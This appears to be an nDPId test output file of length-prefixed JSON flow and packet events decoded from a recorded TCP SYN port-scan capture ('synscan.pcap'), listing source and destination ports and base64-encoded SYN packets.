-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1849,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsLIAAADcG5PKsEAAIQA2GNIzSFi7dUoMYAAAAAGACEAASYQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1850,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsXFUAACYGxh2sEAAIQA2GNIzSCi\/dUoMYAAAAAGACDAAiYAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061206,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1851,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_packet_id":1,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061206,"pkt":"ACYLMQczACWzv5HuCABFAAAsfogAADoGj+qsEAAIQA2GNIzSBwndUoMYAAAAAGACDAAlhgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1852,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1842,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2oAAC4GewisEAAIQA2GNIzSD6HdUoMYAAAAAGACDAAc7gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1853,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1843,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsISAAADgG71KsEAAIQA2GNIzSgAfdUoMYAAAAAGACBAC0hwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1854,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsj\/MAADgGgH+sEAAIQA2GNIzSAYXdUoMYAAAAAGACBAAzCgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1855,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsDY0AADEGCeasEAAIQA2GNIzSDSzdUoMYAAAAAGACCAAjYwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAss7AAADcGXcKsEAAIQA2GNIzSAq\/dUoMYAAAAAGACEAAl4AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsBN0AACkGGpasEAAIQA2GNIzSHvDdUoMYAAAAAGACCAARnwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1848,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsRPEAADIG0YGsEAAIQA2GNIzSwAjdUoMYAAAAAGACDABshgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1859,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsQU0AACwG2yWsEAAIQA2GNIzSC8XdUoMYAAAAAGACBAAoygAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1860,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1850,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAspwkAACcGemmsEAAIQA2GNIzSFGndUoMYAAAAAGACEAAUJgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061207,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1861,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1851,"flow_packet_id":1,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061207,"pkt":"ACYLMQczACWzv5HuCABFAAAsWZIAADsGs+CsEAAIQA2GNIzSCMvdUoMYAAAAAGACEAAfxAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1852,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/fkAACkGIXmsEAAIQA2GNIzTFyXdU4MZAAAAAGACCAAZZwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1863,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1853,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsosMAADgGba+sEAAIQA2GNIzTBNLdU4MZAAAAAGACBAAvugAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1854,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsxwIAADEGUHCsEAAIQA2GNIzTFxvdU4MZAAAAAGACCAAZcQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1855,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsG2YAACoGAw2sEAAIQA2GNIzTG1\/dU4MZAAAAAGACDAARLQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsBP4AADoGCXWsEAAIQA2GNIzTatndU4MZAAAAAGACDADBsgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1867,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsCS8AACsGFESsEAAIQA2GNIzTBIDdU4MZAAAAAGACEAAkDAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1868,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1858,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsNE0AADQG4CWsEAAIQA2GNIzTxczdU4MZAAAAAGACBABuvwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1869,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGwAADgGhAasEAAIQA2GNIzTE4vdU4MZAAAAAGACBAAhAQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsvsAAADAGWbKsEAAIQA2GNIzTBCfdU4MZAAAAAGACBAAwZQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAsu84AACgGZKSsEAAIQA2GNIzTW87dU4MZAAAAAGACBADYvQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_packet_id":1,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061210,"pkt":"ACYLMQczACWzv5HuCABFAAAseXYAACgGpvysEAAIQA2GNIzTCT7dU4MZAAAAAGACBAArTgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1873,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061210,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 